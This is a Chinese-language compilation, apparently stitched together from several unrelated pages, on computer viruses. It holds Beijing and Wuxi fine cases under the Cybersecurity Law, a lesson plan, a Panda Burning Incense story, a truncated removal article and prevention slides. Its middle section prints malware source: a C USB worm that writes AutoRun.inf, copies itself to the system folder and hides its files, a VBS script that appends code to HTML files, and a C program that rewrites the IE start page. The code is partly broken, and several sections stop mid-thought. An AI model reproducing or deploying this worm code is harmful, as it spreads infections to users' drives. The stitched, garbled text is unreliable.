计算机病毒的重大案例

2020年计算机病毒案例案例一：2020年4月，网安部门检查时发现，北京市石景山区某公司网站未采取防范计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施，导致网页被篡改。

事发后，北京市公安局石景山分局指导涉事单位对服务器进行关停，并对单位内部全部系统开展排查工作，及时消除隐患漏洞，加强安全防护。

同时，依据《中华人民共和国网络安全法》第二十一条、第五十九条之规定，给予单位罚款一万五千元、相关责任人罚款五千元的行政处罚。

案例二：网安部门检查时发现，北京市朝阳区某建设公司财务报表管理系统未采取防范计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施，导致被黑客攻击并植入了非法信息，且无法对黑客进行追踪溯源。

2020年6月，北京市公安局朝阳分局根据《中华人民共和国网络安全法》第二十一条、第五十九条之规定，给予该建设公司罚款十万元的行政处罚；给予公司安全负责人罚款五万元的行政处罚。

案例三：网安部门检查时发现，北京某互联网公司网络安全主体责任落实不到位，未按法律要求加强对网站所发布信息的管理，导致运营的APP被不法分子发布淫秽视频。

2020年4月，北京市公安局海淀分局根据《中华人民共和国网络安全法》第四十七条、第六十八条之规定，给予该公司行政罚款十万元的处罚。

案例四：网安部门检查时发现，北京某互联网公司网络安全主体责任落实不到位，未按法律要求加强对网站所发布信息的管理，导致网站存在违法信息。

2020年3月，北京市公安局海淀分局根据《中华人民共和国网络安全法》第四十七条、第六十八条之规定，给予该公司行政罚款十万元的处罚。

案例五：网安部门检查时发现，江阴市某制造企业未按照《网络安全法》规定落实防范计算机病毒和网络攻击、入侵等危害网络安全的技术措施，导致该公司开设的网站被黑客入侵，造成不良影响。

2020年1月，无锡警方依据《中华人民共和国网络安全法》第21条、第59条规定，对该公司予以罚款1万元，对直接负责的主管人员予以罚款5千元，责令限期整改。

2017计算机病毒案例分析计算机病毒相信大家都不陌生，说不定有些同学之前还经历过自己的电脑也中了病毒，下面店铺为大家讲之前发生过的计算机病毒案例!一、U盘病毒AutoRun.inf 文件[AutoRun]open=proj7_2.exe shell\open=打开(&O)shell\open\Command=proj7_2.exe shell\explore=我的资源管理器(&X)shell\\explore\\Command=proj7_2.exeproj7_2.cpp案例名称：U 盘恶意代码程序名称：proj7_2.cpp #include "stdafx.h" bool SaveToFile(char* Path,char* Data){ HANDLE hFile; hFile=CreateFile(Path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,NULL);if(hFile==INVALID_HANDLE_VALUE){/*continue; //出错时处理*/} DWORD dwWrite; WriteFile(hFile,Data,strlen(Data),&dwWrite,NULL); CloseHandle(hFile); return true; } BOOL InfectU() { while(true) { UINT revtype; char name[256]="H:\\" char szName[256]={0}; char toPath[256]={0}; char infPath[256]={0}; char openU[80]={0};/遍历所有盘符for(BYTE i=0x42;i<0x5B;i=i+0x01){ name[0]=i; //得到盘符类型 revtype=GetDriveType(name); //判断是否是可移动存储设备if (revtype==DRIVE_REMOVABLE){ //得到自身文件路径GetModuleFileName(NULL,szName,256); //比较是否和U 盘的盘符相同//如果相同说明在U 盘上执行，复制到系统中去if(strncmp(name,szName,1)==0){ //得到系统目录GetSystemDirectory(toPath,256); strcat(toPath,"\\proj7_2.exe"); //把自身文件复制到系统目录if(CopyFile(szName,toPath,TRUE)) { //运行程序WinExec(toPath,0); } strcpy(openU,"explorer "); strcat(openU,name);//打开U 盘 WinExec(openU,1); return 0; }//如果不是在U 盘上执行，则感染U 盘else { strcpy(toPath,name); strcat(toPath,"\\proj7_2.exe"); strcpy(infPath,name); strcat(infPath,"\\AutoRun.inf");//还原U 盘上的文件属性SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL);SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL); //删除原有文件 DeleteFile(toPath); DeleteFile(infPath); //写AutoRun.inf 到U 盘char* Data; Data = "[AutoRun]\r\nopen=proj7_2.exe\r\nshell\\open= 打开(&O)\r\nshell\\explore=我的资源管理器(&X)\r\nshell\\explore\\Command=proj7_2.exe";SaveToFile(infPath,Data); //拷贝自身文件到U 盘CopyFile(szName,toPath,FALSE); //把这两个文件设置成系统，隐藏属性SetFileAttributes(toPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); SetFileAttributes(infPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); } } } //休眠60 秒，60 检测一次Sleep(60000); } } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { InfectU(); return 0; }二、脚本病毒案例名称：脚本病毒程序名称：Misery.vbs '遇到错误继续执行 On error resume next '遇到错误继续执行On error resume next '定义变量Dim fso,curfolder,curfile '定一个文件操作对象Set fso = createobject("scripting.filesystemobject") '得到当前目录Set curfolder = fso.GetFolder(".") '得到当前目录的文件set files = curfolder.files '文件的打开方式 Const ForReading = 1, ForWriting = 2, ForAppending = 8 '向所有扩展名为htm/HTM/html/HTML 的文件中写代码for each file in Files if UCase(right(,3)) = "HTM" or UCase(right(,4)) = "HTML" then curfile = curfolder & "\" & Set f = fso.OpenTextFile(curfile, ForAppending, True) f.Write vbcrlf f.Write "" end if next f.Close三、案例名称：浏览器恶意代码程序名称：proj7_1.cpp #include #include main() { HKEY hKey1; DWORD dwDisposition; LONG lRetCode; //创建 lRetCode = RegCreateKeyEx ( HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Internet Explorer\\Main", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL, &hKey1, &dwDisposition); //如果创建失败，显示出错信息if (lRetCode != ERROR_SUCCESS){ printf ("Error in creating key\n"); return (0) } //设置键值 lRetCode = RegSetValueEx ( hKey1, "Default_Page_URL", 0, REG_SZ, (byte*)"", 100); //如果创建失败，显示出错信息 if (lRetCode != ERROR_SUCCESS) { printf ( "Error in setting value\n"); return (0) } printf("注册表编写成功!\n"); return(0); }。

《计算机病毒》教学案例[摘要]信息安全日益成为人们关注的焦点，那么如何对接触电脑不久的七年级学生灌输这些理念呢?本案例尝试通过诙谐的案例来引入“计算机病毒”这一概念，通过小组协作的方式来完成课堂任务。

力求使学生轻松愉快的氛围中完成教学任务，进而提升自己的信息素养。

[关键字]计算机病毒信息安全一、教学对象分析与教学设计本案例的教学对象是七年级学生，他们的特点主要表现在：1．七年级学生他们的感知力和观察能力明显提高，在教学中为学生留出一定的选择空间，经常为学生创设一种宽松自主的学习环境，促进学生之间的交流与合作。

能有效的提高学生的学习兴趣。

2．一般来说，一些学生已经对电脑有了一定的认识，并且已经接触了一些有关电脑病毒方面的知识，一些学生甚至有过受病毒侵害的亲身体验。

能对信息进行分类、归纳和整理。

3．但是另有相当一部分的学生，由于小学阶段的教学设备落后以及部分小学对信息技术开展的不重视的缘故，对于电脑的认识可能就是从进入七年级才开始的。

二、教学需要分析与教学设计让学生记住一些知识比较容易，但是让学生利用这些知识解决问题就比较困难了，如果让学生养成良好的行为习惯则是难上加难。

因为在平常的教学中，我们割裂了这之间的本质联系。

我认为，应该给学生创设一种真实的问题情境，让学生在解决问题的过程中学习知识，并且逐渐意识到养成某一习惯的必要性。

同时，学生在合作交流中，不断了解别人、感受别人、理解别人从而学习与他人合作交流的技能。

三、教学目标设置1．了解病毒的基本概念，了解电脑病毒与生物病毒的区别和联系；了解病毒的产生和传播渠道、防范等相关知识；使学生基本掌握防杀病毒的方法；2．通过要求小组成员一起搜集有关电脑病毒的知识，整理和判断所搜集的资料的过程，培养学生的整理、判断资料的能力。

3．培养学生养成杀毒和升级杀毒软件的好习惯。

四、教学方法设计使用创设情境法，理解问题情境——分析问题、提出问题——小组分工合作——搜集、整理资料——得出结论——交流评价。

熊猫烧香案例2006年底，许多人在打开电脑后陷入无知状态。

因为电脑屏幕上有一只可爱的大熊猫，它手里还拿着三支香。

没几天，这只烧香的熊猫几乎侵入了所有人的电脑中。

这是我们小国宝来提前给我们拜年吗？当然不是，这是新型网络病毒，传染性很强。

当时除了私人设备，很多政机构和公司的内网都被他们入侵，网络瞬间瘫痪。

加入网络监管部门后，公安部门意识到此事的重要性，立即立案调查，第二年终于抓到了始作俑者。

2007年9月24日，25岁的李俊因破坏计算机信息系统罪被湖北省仙桃市人民法院判处有期徒刑四年。

网上猖獗的“熊猫烧香”案正式告破。

这个李俊，就是“熊猫烧香”的策划人。

他为什么要策划这起网络病毒案件呢？熊猫烧香在当年到底有多残忍？网络与现实的差距让“天才”误入歧途李俊出生在一个普通家庭，他的父母是低收入工人。

从小就痴迷于玩电脑，有空总会跑去网吧。

那时候电脑和网吧远没有现在普及。

在父母眼里，网吧大多是坏孩子待的地方。

为了防止儿子失败，李俊的父母不得不帮他买了一台电脑。

至少这样，他可以呆在家里，而不是去网吧。

但正因为如此，李俊获得了更多接触电脑的机会。

不得不说他真的是计算机天才，愿意花时间学习编程，学习技术。

兴趣和天赋促成了李俊在计算机方面的超高技术。

然而网络跟现实总是有着差距的。

李俊的学习成绩不好。

他没有学习，后来去了社会上工作。

在他的里，他是互联网上的国王，他不是一个普通人。

然而现实生活中的经历却让他一次次尴尬。

因为他除了网络技术什么技能都没有。

他想从事与互联网相关的工作，比如去一家杀毒软件公司，但因为没有学历背景，一次次被拒之门外。

比较后他不得不去做电脑装修工，甚至是网络管理员，工资低，还被别人指挥，严重损害了他的自尊心。

自命不凡的李俊知道自己唯能找到存在感的地方，就是在网络上。

所以他决定用自己的网络技术去干一件轰动的大事，从而证明自己的能力。

比较早的时候，他是个红客。

2000年前后，黑客经常在国外骚扰中国网站，激起了中国计算机精英的好胜心，上演了一场对外的红与黑的战争。

手动清除计算机病毒案例分析作者：马振伟来源：《电脑知识与技术》2020年第31期摘要：计算机病毒是编制者在计算机程序中插入的破坏计算机功能或者数据的代码，能影响计算机使用，能自我复制的一组计算机指令或者程序代码（1）。

计算机病毒具有很强的隐蔽性，有些可以通过病毒软件监测出来，有些隐蔽性很强，具有一定的环境适应性能力，这类病毒处理进来通常很困难（2）。

由于杀毒软件更新的滞后性，用常规的杀毒方法未必能及时有效，且很容易损坏正常软件，造成计算机无法正常运转等损失。

正确分析计算机的异常行为，查找发病源，通过手动杀毒，也是一种直观的方法及有价值的尝试。

关键词：计算机病毒;杀毒软件;手动杀毒中图分类号：TP311 文献标识码：A文章编号：1009-3044（2020）31-0071-02计算机感染病毒后通常会出现一些容易发觉的异常表现行为，如计算机启动速度慢、程序运行卡顿、文件损坏或丢失以及出现间歇性断网等。

通过计算机行为的异常表现，然后反推问题的根源，再通过适当的杀毒方法进行病毒清除。

下面是一个服务器出现异常的案例：笔者打开服务器时异常卡顿，打开任务管理发现svchost运行程序占用CPU资源达到99%以上，严重影响了服务器的运行，这是病毒的一种典型表现。

1 病毒特征分析1.1 Svchost进程分析Svchost.exe是Windows操作系统中的核心进程文件，从动态链接库（Dynamic Link library，DLL）中加载的通用主机进程，该进程是系统运行的基础进程之一，且不能被中止（3）。

因为svchost.exe是一個基础进程，可以访问很多系统资源和文件，所以svchost.exe非常容易被病毒所利用。

被病毒利用之后，系统常会弹出svchost.exe错误，当然svchost.exe病毒也有不少专杀工具。

很多木马程序喜欢伪装成这个服务程序来逃过查杀。

为进一步确认，笔者通过资源管理器观察了一下这个进程的更多属性，发现了更多异常之处。

计算机病毒防治措施xx年xx月xx日contents •计算机病毒概述•计算机病毒传播途径•计算机病毒危害•计算机病毒防治技术•计算机病毒防治策略•计算机病毒典型案例目录01计算机病毒概述计算机病毒是一种恶意软件，它能够复制自身并且在计算机网络中进行传播，从而破坏数据、干扰计算机操作，甚至危害网络安全。

计算机病毒通常隐藏在电子邮件附件、网页浏览器、应用程序、共享软件等中，并且在用户不知情的情况下被下载和执行。

计算机病毒的定义计算机病毒的特点计算机病毒可以复制自身，并且通过感染文件、内存、网络等方式进行传播。

繁殖性隐蔽性破坏性传染性计算机病毒往往隐藏在正常程序中，难以被发现。

计算机病毒可以破坏数据、干扰计算机操作，甚至危害网络安全。

计算机病毒可以通过各种方式在计算机网络中进行传播。

1计算机病毒的分类23根据传播途径的不同，计算机病毒可以分为蠕虫病毒、文件病毒、宏病毒、网络病毒等。

根据传播途径分类根据破坏性程度的不同，计算机病毒可以分为良性病毒和恶性病毒。

根据破坏性程度分类根据行为特点的不同，计算机病毒可以分为木马病毒、黑客病毒、蠕虫病毒等。

根据行为特点分类02计算机病毒传播途径03共享文件夹传播限制使用共享文件夹，避免在其中保存敏感信息；对共享文件夹设置访问权限。

网络传播01网上下载病毒不从不可信的网站下载软件，特别是游戏、音乐、电影等文件；下载后应使用防病毒软件进行彻底检查。

02网络钓鱼攻击警惕网络钓鱼攻击，不打开陌生人发送的邮件、链接或附件；避免使用弱密码，并定期更新密码。

对移动存储设备进行防病毒扫描，并定期更新防病毒软件。

移动设备防病毒不将未知来源的设备连接到电脑，避免使用USB 自动播放功能。

安全使用移动设备使用移动设备时，应避免将设备连接到有病毒风险的电脑。

设备间传播移动存储设备传播文件传播文件防病毒扫描对所有从网络或可疑来源接收的文件进行防病毒扫描。

不打开未知来源的文件不打开未知来源的邮件、下载或复制的文件。